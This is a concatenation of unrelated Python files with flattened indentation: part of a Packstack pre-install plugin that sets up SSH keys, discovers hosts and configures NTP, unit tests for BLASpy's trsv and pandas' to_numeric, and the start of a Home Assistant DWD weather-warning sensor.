"PROMPT" : "Should Packstack install OpenStack client tools",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "y",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_CLIENT_INSTALL",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "ntp-servers",
"USAGE" : "Comma separated list of NTP servers. Leave plain if Packstack should not install ntpd on instances.",
"PROMPT" : "Enter a comma separated list of NTP server(s). Leave plain if Packstack should not install ntpd on instances.",
"OPTION_LIST" : [],
"DEFAULT_VALUE" : '',
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_NTP_SERVERS",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "nagios-install",
"USAGE" : "Set to 'y' if you would like Packstack to install Nagios to monitor OpenStack hosts",
"PROMPT" : "Should Packstack install Nagios to monitor OpenStack hosts",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : 'n',
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_NAGIOS_INSTALL",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "exclude-servers",
"USAGE" : "Comma separated list of servers to be excluded from installation in case you are running Packstack the second time with the same answer file and don't want Packstack to touch these servers. Leave plain if you don't need to exclude any server.",
"PROMPT" : "Enter a comma separated list of server(s) to be excluded. Leave plain if you don't need to exclude any server.",
"OPTION_LIST" : [],
"DEFAULT_VALUE" : '',
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "EXCLUDE_SERVERS",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-debug-mode",
"USAGE" : ("Set to 'y' if you want to run "
"OpenStack services in debug mode. "
"Otherwise set to 'n'."),
"PROMPT" : ("Do you want to run OpenStack services"
" in debug mode"),
"OPTION_LIST" : ["y", "n"],
"DEFAULT_VALUE" : "n",
"VALIDATORS" : [validators.validate_options],
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_DEBUG_MODE",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
]
groupDict = { "GROUP_NAME" : "GLOBAL",
"DESCRIPTION" : "Global Options",
"PRE_CONDITION" : lambda x: 'yes',
"PRE_CONDITION_MATCH" : "yes",
"POST_CONDITION" : False,
"POST_CONDITION_MATCH" : True}
controller.addGroup(groupDict, paramsList)
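# Each parameter dict above typically surfaces in three places: as a command
# line option derived from CMD_OPTION (e.g. --os-mysql-install=y), as the
# interactive PROMPT, and as the CONF_NAME key written to the answer file
# (e.g. CONFIG_MYSQL_INSTALL=y). The example values are illustrative only.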
def initSequences(controller):
prescript_steps = [
{'title': 'Setting up ssh keys',
'functions':[install_keys]},
{'title': 'Discovering hosts\' details',
'functions': [discover]},
{'title': 'Adding pre install manifest entries',
'functions':[create_manifest]},
]
if controller.CONF['CONFIG_NTP_SERVERS']:
prescript_steps.append({
'title': 'Installing time synchronization via NTP',
'functions': [create_ntp_manifest],
})
else:
controller.MESSAGES.append('Time synchronization installation '
'was skipped. Please note that '
'unsynchronized time on server '
'instances might be a problem for '
'some OpenStack components.')
controller.addSequence("Running pre install scripts", [], [],
prescript_steps)
def install_keys(config):
with open(config["CONFIG_SSH_KEY"]) as fp:
sshkeydata = fp.read().strip()
for hostname in filtered_hosts(config):
if '/' in hostname:
hostname = hostname.split('/')[0]
server = utils.ScriptRunner(hostname)
# TODO replace all that with ssh-copy-id
server.append("mkdir -p ~/.ssh")
server.append("chmod 500 ~/.ssh")
server.append("grep '%s' ~/.ssh/authorized_keys > /dev/null 2>&1 || "
"echo %s >> ~/.ssh/authorized_keys"
% (sshkeydata, sshkeydata))
server.append("chmod 400 ~/.ssh/authorized_keys")
server.append("restorecon -r ~/.ssh")
server.execute()
def discover(config):
"""
Discovers details about hosts.
"""
# TODO: Once Controller is refactored, move this function to it (facter can
# be used for that too).
details = {}
release_regexp = re.compile(r'^(?P<OS>.*) release (?P<release>[\d\.]*)')
for host in filtered_hosts(config):
details.setdefault(host, {})
server = utils.ScriptRunner(host)
# discover OS and release
server.append('cat /etc/redhat-release')
try:
rc, out = server.execute()
match = release_regexp.search(out)
if not match:
raise exceptions.ScriptRuntimeError()
except exceptions.ScriptRuntimeError:
details[host]['os'] = 'Unknown'
details[host]['release'] = 'Unknown'
else:
opsys = match.group('OS')
for pattern, surr in [('^Red Hat Enterprise Linux.*', 'RHEL'),
('^Fedora.*', 'Fedora'),
('^CentOS.*', 'CentOS'),
('^Scientific Linux.*', 'SL')]:
opsys = re.sub(pattern, surr, opsys)
details[host]['os'] = opsys
details[host]['release'] = match.group('release')
# Create the packstack tmp directory
server.clear()
server.append("mkdir -p %s" % basedefs.PACKSTACK_VAR_DIR)
# Separately create the tmp directory for this packstack run, this will
# fail if the directory already exists
host_dir = os.path.join(basedefs.PACKSTACK_VAR_DIR, uuid.uuid4().hex)
server.append("mkdir --mode 0700 %s" % host_dir)
for i in ('modules', 'resources'):
server.append("mkdir --mode 0700 %s" % os.path.join(host_dir, i))
server.execute()
details[host]['tmpdir'] = host_dir
config['HOST_DETAILS'] = details
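# Resulting structure (host address and release values are illustrative only):
#
#   config['HOST_DETAILS'] = {
#       '192.168.0.10': {'os': 'CentOS', 'release': '6.4',
#                        'tmpdir': '<PACKSTACK_VAR_DIR>/<random hex>'},
#       ...
#   }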
def create_manifest(config):
key = 'CONFIG_DEBUG_MODE'
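# Translate the 'y'/'n' answer into the lowercase boolean string consumed by
# the manifests (assumption about the template side, added for clarity).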
config[key] = 'true' if config[key] == 'y' else 'false'
for hostname in filtered_hosts(config):
manifestfile = "%s_prescript.pp" % hostname
manifestdata = getManifestTemplate("prescript.pp")
appendManifestFile(manifestfile, manifestdata)
def create_ntp_manifest(config):
srvlist = [i.strip()
for i in config['CONFIG_NTP_SERVERS'].split(',')
if i.strip()]
config['CONFIG_NTP_SERVERS'] = ' '.join(srvlist)
definition = '\n'.join(['server %s' % i for i in srvlist])
config['CONFIG_NTP_SERVER_DEF'] = '%s\n' % definition
marker = uuid.uuid4().hex[:16]
for hostname in filtered_hosts(config):
manifestdata = getManifestTemplate('ntpd.pp')
appendManifestFile('%s_ntpd.pp' % hostname,
manifestdata,
marker=marker)
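# For example, CONFIG_NTP_SERVERS = '0.pool.ntp.org, 1.pool.ntp.org' yields
# CONFIG_NTP_SERVER_DEF = 'server 0.pool.ntp.org\nserver 1.pool.ntp.org\n'
# (server names here are placeholders).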
|
|
"""
Copyright (c) 2014-2015, The University of Texas at Austin.
All rights reserved.
This file is part of BLASpy and is available under the 3-Clause
BSD License, which can be found in the LICENSE file at the top-level
directory or at http://opensource.org/licenses/BSD-3-Clause
"""
from blaspy import trsv
from numpy import array, asmatrix
from string import ascii_letters
from unittest import TestCase
class TestTrsv(TestCase):
def test_scalars_as_ndarray(self):
A = array([[1.]])
b = array([[2.]])
self.assertEqual(trsv(A, b), 2)
self.assertEqual(b, 2)
def test_row_as_ndarray(self):
A = array([[1., 2.],
[0., 3.]])
b = array([[5., 6.]])
expected = [[1., 2.]]
self.assertListEqual(trsv(A, b).tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_col_as_ndarray(self):
A = array([[1., 2.],
[0., 3.]])
b = array([[5.],
[6.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b).tolist(), expected)
self.assertListEqual(b.tolist(), expected)
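# Worked example for the system used throughout these tests: with
# A = [[1, 2], [0, 3]] and b = [5, 6], back substitution gives
# x2 = 6/3 = 2 and x1 = 5 - 2*2 = 1, hence the expected [[1.], [2.]].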
def test_lower_triangle_ignored_with_uplo_u(self):
A = array([[1., 2.],
[-100., 3.]])
b = array([[5.],
[6.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, uplo='u').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_lower_triangle_ignored_with_uplo_U(self):
A = array([[1., 2.],
[-100., 3.]])
b = array([[5.],
[6.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, uplo='U').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_upper_triangle_ignored_with_uplo_l(self):
A = array([[1., 55.],
[2., 3.]])
b = array([[1.],
[8.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, uplo='l').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_upper_triangle_ignored_with_uplo_L(self):
A = array([[1., 55.],
[2., 3.]])
b = array([[1.],
[8.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, uplo='L').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_A_not_transposed_with_trans_a_n(self):
A = array([[1., 2.],
[0., 3.]])
b = array([[5.],
[6.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, trans_a='n').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_A_not_transposed_with_trans_a_N(self):
A = array([[1., 2.],
[0., 3.]])
b = array([[5.],
[6.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, trans_a='N').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_A_transposed_with_trans_a_t(self):
A = array([[1., 2.],
[0., 3.]])
b = array([[1.],
[8.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, trans_a='t').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_A_transposed_with_trans_a_T(self):
A = array([[1., 2.],
[0., 3.]])
b = array([[1.],
[8.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, trans_a='T').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_A_non_unit_diag_with_diag_n(self):
A = array([[1., 2.],
[0., 3.]])
b = array([[5.],
[6.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, diag='n').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_A_non_unit_diag_with_diag_N(self):
A = array([[1., 2.],
[0., 3.]])
b = array([[5.],
[6.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, diag='N').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_A_unit_diag_with_diag_u(self):
A = array([[1., 2.],
[0., 3.]])
b = array([[5.],
[2.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, diag='u').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_A_unit_diag_with_diag_U(self):
A = array([[1., 2.],
[0., 3.]])
b = array([[5.],
[2.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, diag='U').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_uplo_l_and_trans_a_t(self):
A = array([[1., -100.],
[2., 3.]])
b = array([[5.],
[6.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, uplo='l', trans_a='t').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_uplo_l_and_trans_a_t_and_diag_u(self):
A = array([[1., -100.],
[2., 3.]])
b = array([[5.],
[2.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b, uplo='l', trans_a='t', diag='u').tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_as_matrix_all(self):
A = asmatrix(array([[1., 2.],
[0., 3.]]))
b = asmatrix(array([[5.],
[6.]]))
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b).tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_as_matrix_mixed(self):
A = asmatrix(array([[1., 2.],
[0., 3.]]))
b = array([[5.],
[6.]])
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b).tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_stride_less_than_length(self):
A = array([[1., 2.],
[0., 3.]])
b = array([[5.],
[3.],
[6.],
[4.]])
expected = [[1.],
[3.],
[2.],
[4.]]
self.assertListEqual(trsv(A, b, inc_b=2).tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_stride_greater_than_length(self):
A = array([[1.]])
b = array([[5.],
[2.],
[3.],
[4.]])
expected = [[5.],
[2.],
[3.],
[4.]]
self.assertListEqual(trsv(A, b, inc_b=4).tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_float32_dtype(self):
A = array([[1., 2.],
[0., 3.]], dtype='float32')
b = array([[5.],
[6.]], dtype='float32')
self.assertEqual(A.dtype, 'float32')
self.assertEqual(b.dtype, 'float32')
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b).tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_float64_dtype(self):
A = array([[1., 2.],
[0., 3.]], dtype='float64')
b = array([[5.],
[6.]], dtype='float64')
self.assertEqual(A.dtype, 'float64')
self.assertEqual(b.dtype, 'float64')
expected = [[1.],
[2.]]
self.assertListEqual(trsv(A, b).tolist(), expected)
self.assertListEqual(b.tolist(), expected)
def test_not_numpy_with_list_for_A_raises_ValueError(self):
A = [[1., 2.],
[3., 4.]]
b = array([[1.],
[2.]])
self.assertRaises(ValueError, trsv, A, b)
def test_not_numpy_with_list_for_b_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]])
b = [[1.],
[2.]]
self.assertRaises(ValueError, trsv, A, b)
def test_not_numpy_with_scalar_for_A_raises_ValueError(self):
A = 1.
b = array([[1.]])
self.assertRaises(ValueError, trsv, A, b)
def test_not_numpy_with_scalar_for_b_raises_ValueError(self):
A = array([[1.]])
b = 1.
self.assertRaises(ValueError, trsv, A, b)
def test_not_2d_numpy_with_1d_for_A_raises_ValueError(self):
A = array([1., 2., 2., 1.])
b = array([[1.],
[2.]])
self.assertRaises(ValueError, trsv, A, b)
def test_not_2d_numpy_with_1d_for_b_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]])
b = array([1., 2.])
self.assertRaises(ValueError, trsv, A, b)
def test_not_2d_numpy_with_3d_for_A_raises_ValueError(self):
A = array([[[1., 2.],
[2., 3.]]], ndmin=3)
b = array([[1.],
[2.]])
self.assertRaises(ValueError, trsv, A, b)
def test_not_2d_numpy_with_3d_for_b_raises_ValueError(self):
A = array([[1., 2.],
[2., 3.]])
b = array([[[1., 2.]]], ndmin=3)
self.assertRaises(ValueError, trsv, A, b)
def test_nonconforming_b_raises_ValueError(self):
A = array([[1., 2.],
[2., 3.]])
b = array([[1.],
[2.],
[3.]])
self.assertRaises(ValueError, trsv, A, b)
def test_non_square_A_raises_ValueError(self):
A = array([[1., 2., 3.],
[2., 3., 4.]])
b = array([[1.],
[2.],
[3.]])
self.assertRaises(ValueError, trsv, A, b)
def test_nonconforming_b_with_strides_raises_ValueError(self):
A = array([[1., 2.],
[2., 3.]])
b = array([[1.],
[2.]])
self.assertRaises(ValueError, trsv, A, b, 'u', 'n', 'n', None, 2)
def test_not_vector_raises_ValueError(self):
A = array([[1., 2.],
[2., 3.]])
b = array([[1., 2.],
[2., 3.]])
self.assertRaises(ValueError, trsv, A, b)
def test_mixed_dtypes1_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]], dtype='float32')
b = array([[1.],
[2.]], dtype='float64')
self.assertEqual(A.dtype, 'float32')
self.assertEqual(b.dtype, 'float64')
self.assertRaises(ValueError, trsv, A, b)
def test_mixed_dtypes2_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]], dtype='float64')
b = array([[1.],
[2.]], dtype='float32')
self.assertEqual(A.dtype, 'float64')
self.assertEqual(b.dtype, 'float32')
self.assertRaises(ValueError, trsv, A, b)
def test_integer_dtype_for_all_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]], dtype='int')
b = array([[1.],
[2.]], dtype='int')
self.assertEqual(A.dtype, 'int')
self.assertEqual(b.dtype, 'int')
self.assertRaises(ValueError, trsv, A, b)
def test_complex_dtype_for_all_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]], dtype='complex')
b = array([[1.],
[2.]], dtype='complex')
self.assertEqual(A.dtype, 'complex')
self.assertEqual(b.dtype, 'complex')
self.assertRaises(ValueError, trsv, A, b)
def test_invalid_values_for_uplo_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]])
b = array([[1.],
[2.]])
for char in ascii_letters:
if char not in ('u', 'U', 'l', 'L'):
self.assertRaises(ValueError, trsv, A, b, char)
def test_invalid_values_for_trans_a_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]])
b = array([[1.],
[2.]])
for char in ascii_letters:
if char not in ('n', 'N', 't', 'T'):
self.assertRaises(ValueError, trsv, A, b, 'u', char)
def test_invalid_values_for_diag_raises_ValueError(self):
A = array([[1., 2.],
[3., 4.]])
b = array([[1.],
[2.]])
for char in ascii_letters:
if char not in ('n', 'N', 'u', 'U'):
self.assertRaises(ValueError, trsv, A, b, 'u', 'n', char)
|
|
import pytest
import decimal
import numpy as np
import pandas as pd
from pandas import to_numeric, _np_version_under1p9
from pandas.util import testing as tm
from numpy import iinfo
class TestToNumeric(object):
def test_series(self):
s = pd.Series(['1', '-3.14', '7'])
res = to_numeric(s)
expected = pd.Series([1, -3.14, 7])
tm.assert_series_equal(res, expected)
s = pd.Series(['1', '-3.14', 7])
res = to_numeric(s)
tm.assert_series_equal(res, expected)
def test_series_numeric(self):
s = pd.Series([1, 3, 4, 5], index=list('ABCD'), name='XXX')
res = to_numeric(s)
tm.assert_series_equal(res, s)
s = pd.Series([1., 3., 4., 5.], index=list('ABCD'), name='XXX')
res = to_numeric(s)
tm.assert_series_equal(res, s)
# bool is regarded as numeric
s = pd.Series([True, False, True, True],
index=list('ABCD'), name='XXX')
res = to_numeric(s)
tm.assert_series_equal(res, s)
def test_error(self):
s = pd.Series([1, -3.14, 'apple'])
msg = 'Unable to parse string "apple" at position 2'
with tm.assert_raises_regex(ValueError, msg):
to_numeric(s, errors='raise')
res = to_numeric(s, errors='ignore')
expected = pd.Series([1, -3.14, 'apple'])
tm.assert_series_equal(res, expected)
res = to_numeric(s, errors='coerce')
expected = pd.Series([1, -3.14, np.nan])
tm.assert_series_equal(res, expected)
s = pd.Series(['orange', 1, -3.14, 'apple'])
msg = 'Unable to parse string "orange" at position 0'
with tm.assert_raises_regex(ValueError, msg):
to_numeric(s, errors='raise')
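# The three errors= modes exercised above: 'raise' propagates the parse
# error, 'ignore' returns the input unchanged, and 'coerce' replaces
# unparseable values with NaN.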
def test_error_seen_bool(self):
s = pd.Series([True, False, 'apple'])
msg = 'Unable to parse string "apple" at position 2'
with tm.assert_raises_regex(ValueError, msg):
to_numeric(s, errors='raise')
res = to_numeric(s, errors='ignore')
expected = pd.Series([True, False, 'apple'])
tm.assert_series_equal(res, expected)
# coerces to float
res = to_numeric(s, errors='coerce')
expected = pd.Series([1., 0., np.nan])
tm.assert_series_equal(res, expected)
def test_list(self):
s = ['1', '-3.14', '7']
res = to_numeric(s)
expected = np.array([1, -3.14, 7])
tm.assert_numpy_array_equal(res, expected)
def test_list_numeric(self):
s = [1, 3, 4, 5]
res = to_numeric(s)
tm.assert_numpy_array_equal(res, np.array(s, dtype=np.int64))
s = [1., 3., 4., 5.]
res = to_numeric(s)
tm.assert_numpy_array_equal(res, np.array(s))
# bool is regarded as numeric
s = [True, False, True, True]
res = to_numeric(s)
tm.assert_numpy_array_equal(res, np.array(s))
def test_numeric(self):
s = pd.Series([1, -3.14, 7], dtype='O')
res = to_numeric(s)
expected = pd.Series([1, -3.14, 7])
tm.assert_series_equal(res, expected)
s = pd.Series([1, -3.14, 7])
res = to_numeric(s)
tm.assert_series_equal(res, expected)
# GH 14827
df = pd.DataFrame(dict(
a=[1.2, decimal.Decimal(3.14), decimal.Decimal("infinity"), '0.1'],
b=[1.0, 2.0, 3.0, 4.0],
))
expected = pd.DataFrame(dict(
a=[1.2, 3.14, np.inf, 0.1],
b=[1.0, 2.0, 3.0, 4.0],
))
# Test to_numeric over one column
df_copy = df.copy()
df_copy['a'] = df_copy['a'].apply(to_numeric)
tm.assert_frame_equal(df_copy, expected)
# Test to_numeric over multiple columns
df_copy = df.copy()
df_copy[['a', 'b']] = df_copy[['a', 'b']].apply(to_numeric)
tm.assert_frame_equal(df_copy, expected)
def test_numeric_lists_and_arrays(self):
# Test to_numeric with embedded lists and arrays
df = pd.DataFrame(dict(
a=[[decimal.Decimal(3.14), 1.0], decimal.Decimal(1.6), 0.1]
))
df['a'] = df['a'].apply(to_numeric)
expected = pd.DataFrame(dict(
a=[[3.14, 1.0], 1.6, 0.1],
))
tm.assert_frame_equal(df, expected)
df = pd.DataFrame(dict(
a=[np.array([decimal.Decimal(3.14), 1.0]), 0.1]
))
df['a'] = df['a'].apply(to_numeric)
expected = pd.DataFrame(dict(
a=[[3.14, 1.0], 0.1],
))
tm.assert_frame_equal(df, expected)
def test_all_nan(self):
s = pd.Series(['a', 'b', 'c'])
res = to_numeric(s, errors='coerce')
expected = pd.Series([np.nan, np.nan, np.nan])
tm.assert_series_equal(res, expected)
def test_type_check(self):
# GH 11776
df = pd.DataFrame({'a': [1, -3.14, 7], 'b': ['4', '5', '6']})
with tm.assert_raises_regex(TypeError, "1-d array"):
to_numeric(df)
for errors in ['ignore', 'raise', 'coerce']:
with tm.assert_raises_regex(TypeError, "1-d array"):
to_numeric(df, errors=errors)
def test_scalar(self):
assert pd.to_numeric(1) == 1
assert pd.to_numeric(1.1) == 1.1
assert pd.to_numeric('1') == 1
assert pd.to_numeric('1.1') == 1.1
with pytest.raises(ValueError):
to_numeric('XX', errors='raise')
assert to_numeric('XX', errors='ignore') == 'XX'
assert np.isnan(to_numeric('XX', errors='coerce'))
def test_numeric_dtypes(self):
idx = pd.Index([1, 2, 3], name='xxx')
res = pd.to_numeric(idx)
tm.assert_index_equal(res, idx)
res = pd.to_numeric(pd.Series(idx, name='xxx'))
tm.assert_series_equal(res, pd.Series(idx, name='xxx'))
res = pd.to_numeric(idx.values)
tm.assert_numpy_array_equal(res, idx.values)
idx = pd.Index([1., np.nan, 3., np.nan], name='xxx')
res = pd.to_numeric(idx)
tm.assert_index_equal(res, idx)
res = pd.to_numeric(pd.Series(idx, name='xxx'))
tm.assert_series_equal(res, pd.Series(idx, name='xxx'))
res = pd.to_numeric(idx.values)
tm.assert_numpy_array_equal(res, idx.values)
def test_str(self):
idx = pd.Index(['1', '2', '3'], name='xxx')
exp = np.array([1, 2, 3], dtype='int64')
res = pd.to_numeric(idx)
tm.assert_index_equal(res, pd.Index(exp, name='xxx'))
res = pd.to_numeric(pd.Series(idx, name='xxx'))
tm.assert_series_equal(res, pd.Series(exp, name='xxx'))
res = pd.to_numeric(idx.values)
tm.assert_numpy_array_equal(res, exp)
idx = pd.Index(['1.5', '2.7', '3.4'], name='xxx')
exp = np.array([1.5, 2.7, 3.4])
res = pd.to_numeric(idx)
tm.assert_index_equal(res, pd.Index(exp, name='xxx'))
res = pd.to_numeric(pd.Series(idx, name='xxx'))
tm.assert_series_equal(res, pd.Series(exp, name='xxx'))
res = pd.to_numeric(idx.values)
tm.assert_numpy_array_equal(res, exp)
def test_datetimelike(self):
for tz in [None, 'US/Eastern', 'Asia/Tokyo']:
idx = pd.date_range('20130101', periods=3, tz=tz, name='xxx')
res = pd.to_numeric(idx)
tm.assert_index_equal(res, pd.Index(idx.asi8, name='xxx'))
res = pd.to_numeric(pd.Series(idx, name='xxx'))
tm.assert_series_equal(res, pd.Series(idx.asi8, name='xxx'))
res = pd.to_numeric(idx.values)
tm.assert_numpy_array_equal(res, idx.asi8)
def test_timedelta(self):
idx = pd.timedelta_range('1 days', periods=3, freq='D', name='xxx')
res = pd.to_numeric(idx)
tm.assert_index_equal(res, pd.Index(idx.asi8, name='xxx'))
res = pd.to_numeric(pd.Series(idx, name='xxx'))
tm.assert_series_equal(res, pd.Series(idx.asi8, name='xxx'))
res = pd.to_numeric(idx.values)
tm.assert_numpy_array_equal(res, idx.asi8)
def test_period(self):
idx = pd.period_range('2011-01', periods=3, freq='M', name='xxx')
res = pd.to_numeric(idx)
tm.assert_index_equal(res, pd.Index(idx.asi8, name='xxx'))
# ToDo: enable when we can support native PeriodDtype
# res = pd.to_numeric(pd.Series(idx, name='xxx'))
# tm.assert_series_equal(res, pd.Series(idx.asi8, name='xxx'))
def test_non_hashable(self):
# Test for Bug #13324
s = pd.Series([[10.0, 2], 1.0, 'apple'])
res = pd.to_numeric(s, errors='coerce')
tm.assert_series_equal(res, pd.Series([np.nan, 1.0, np.nan]))
res = pd.to_numeric(s, errors='ignore')
tm.assert_series_equal(res, pd.Series([[10.0, 2], 1.0, 'apple']))
with tm.assert_raises_regex(TypeError, "Invalid object type"):
pd.to_numeric(s)
def test_downcast(self):
# see gh-13352
mixed_data = ['1', 2, 3]
int_data = [1, 2, 3]
date_data = np.array(['1970-01-02', '1970-01-03',
'1970-01-04'], dtype='datetime64[D]')
invalid_downcast = 'unsigned-integer'
msg = 'invalid downcasting method provided'
smallest_int_dtype = np.dtype(np.typecodes['Integer'][0])
smallest_uint_dtype = np.dtype(np.typecodes['UnsignedInteger'][0])
# support for float dtypes below np.float32 is few and far between
float_32_char = np.dtype(np.float32).char
smallest_float_dtype = float_32_char
for data in (mixed_data, int_data, date_data):
with tm.assert_raises_regex(ValueError, msg):
pd.to_numeric(data, downcast=invalid_downcast)
expected = np.array([1, 2, 3], dtype=np.int64)
res = pd.to_numeric(data)
tm.assert_numpy_array_equal(res, expected)
res = pd.to_numeric(data, downcast=None)
tm.assert_numpy_array_equal(res, expected)
expected = np.array([1, 2, 3], dtype=smallest_int_dtype)
for signed_downcast in ('integer', 'signed'):
res = pd.to_numeric(data, downcast=signed_downcast)
tm.assert_numpy_array_equal(res, expected)
expected = np.array([1, 2, 3], dtype=smallest_uint_dtype)
res = pd.to_numeric(data, downcast='unsigned')
tm.assert_numpy_array_equal(res, expected)
expected = np.array([1, 2, 3], dtype=smallest_float_dtype)
res = pd.to_numeric(data, downcast='float')
tm.assert_numpy_array_equal(res, expected)
# if we can't successfully cast the given
# data to a numeric dtype, do not bother
# with the downcast parameter
data = ['foo', 2, 3]
expected = np.array(data, dtype=object)
res = pd.to_numeric(data, errors='ignore',
downcast='unsigned')
tm.assert_numpy_array_equal(res, expected)
# cannot cast to an unsigned integer because
# we have a negative number
data = ['-1', 2, 3]
expected = np.array([-1, 2, 3], dtype=np.int64)
res = pd.to_numeric(data, downcast='unsigned')
tm.assert_numpy_array_equal(res, expected)
# cannot cast to an integer (signed or unsigned)
# because we have a float number
data = (['1.1', 2, 3],
[10000.0, 20000, 3000, 40000.36, 50000, 50000.00])
expected = (np.array([1.1, 2, 3], dtype=np.float64),
np.array([10000.0, 20000, 3000,
40000.36, 50000, 50000.00], dtype=np.float64))
for _data, _expected in zip(data, expected):
for downcast in ('integer', 'signed', 'unsigned'):
res = pd.to_numeric(_data, downcast=downcast)
tm.assert_numpy_array_equal(res, _expected)
# the smallest integer dtype need not be np.(u)int8
data = ['256', 257, 258]
for downcast, expected_dtype in zip(
['integer', 'signed', 'unsigned'],
[np.int16, np.int16, np.uint16]):
expected = np.array([256, 257, 258], dtype=expected_dtype)
res = pd.to_numeric(data, downcast=downcast)
tm.assert_numpy_array_equal(res, expected)
def test_downcast_limits(self):
# Test the limits of each downcast. Bug: #14401.
# Check to make sure numpy is new enough to run this test.
if _np_version_under1p9:
pytest.skip("Numpy version is under 1.9")
i = 'integer'
u = 'unsigned'
dtype_downcast_min_max = [
('int8', i, [iinfo(np.int8).min, iinfo(np.int8).max]),
('int16', i, [iinfo(np.int16).min, iinfo(np.int16).max]),
('int32', i, [iinfo(np.int32).min, iinfo(np.int32).max]),
('int64', i, [iinfo(np.int64).min, iinfo(np.int64).max]),
('uint8', u, [iinfo(np.uint8).min, iinfo(np.uint8).max]),
('uint16', u, [iinfo(np.uint16).min, iinfo(np.uint16).max]),
('uint32', u, [iinfo(np.uint32).min, iinfo(np.uint32).max]),
('uint64', u, [iinfo(np.uint64).min, iinfo(np.uint64).max]),
('int16', i, [iinfo(np.int8).min, iinfo(np.int8).max + 1]),
('int32', i, [iinfo(np.int16).min, iinfo(np.int16).max + 1]),
('int64', i, [iinfo(np.int32).min, iinfo(np.int32).max + 1]),
('int16', i, [iinfo(np.int8).min - 1, iinfo(np.int16).max]),
('int32', i, [iinfo(np.int16).min - 1, iinfo(np.int32).max]),
('int64', i, [iinfo(np.int32).min - 1, iinfo(np.int64).max]),
('uint16', u, [iinfo(np.uint8).min, iinfo(np.uint8).max + 1]),
('uint32', u, [iinfo(np.uint16).min, iinfo(np.uint16).max + 1]),
('uint64', u, [iinfo(np.uint32).min, iinfo(np.uint32).max + 1])
]
for dtype, downcast, min_max in dtype_downcast_min_max:
series = pd.to_numeric(pd.Series(min_max), downcast=downcast)
assert series.dtype == dtype
|
|
"""
Support for getting statistical data from the DWD Weather Warnings service.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.dwd_weather_warnings/
Data is fetched from DWD:
https://rcccm.dwd.de/DE/wetter/warnungen_aktuell/objekt_einbindung/objekteinbindung.html
Warnungen vor extremem Unwetter (Stufe 4) - warnings of extreme severe weather (level 4)
Unwetterwarnungen (Stufe 3) - severe weather warnings (level 3)
Warnungen vor markantem Wetter (Stufe 2) - warnings of significant weather (level 2)
Wetterwarnungen (Stufe 1) - weather warnings (level 1)
"""
import logging
import json
from datetime import timedelta
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import ATTR_ATTRIBUTION, CONF_NAME, CONF_MONITORED_CONDITIONS
from homeassistant.util import Throttle
